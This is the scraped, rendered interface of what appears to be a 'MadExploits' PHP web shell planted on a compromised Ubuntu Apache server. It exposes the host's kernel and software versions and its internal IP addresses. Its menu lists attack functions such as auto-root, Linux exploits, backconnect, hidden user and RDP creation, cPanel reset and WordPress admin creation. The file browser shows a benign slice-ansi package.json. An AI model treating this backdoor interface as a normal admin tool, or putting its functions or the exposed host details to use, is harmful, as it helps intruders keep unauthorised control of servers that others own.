Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
slice-ansi /
[ HOME SHELL ]
Name
Size
Permission
Action
index.cjs
1.01
KB
-rw-r--r--
index.js
2.63
KB
-rw-r--r--
package.json
939
B
-rw-r--r--
pkgjs-lock.json
481
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "slice-ansi", "version": "5.0.0", "description": "Slice a string with ANSI escape codes", "license": "MIT", "repository": "chalk/slice-ansi", "funding": "https://github.com/chalk/slice-ansi?sponsor=1", "type": "module", "main": "./index.cjs", "exports": { "import": "./index.js", "require": "./index.cjs" }, "engines": { "node": ">=12" }, "scripts": { "test": "xo && ava" }, "files": [ "index.cjs", "index.js" ], "keywords": [ "slice", "string", "ansi", "styles", "color", "colour", "colors", "terminal", "console", "cli", "tty", "escape", "formatting", "rgb", "256", "shell", "xterm", "log", "logging", "command-line", "text" ], "dependencies": { "ansi-styles": "^6.0.0", "is-fullwidth-code-point": "^4.0.0" }, "devDependencies": { "ava": "^3.15.0", "chalk": "^4.1.0", "random-item": "^4.0.0", "strip-ansi": "^7.0.0", "xo": "^0.38.2" } }
Close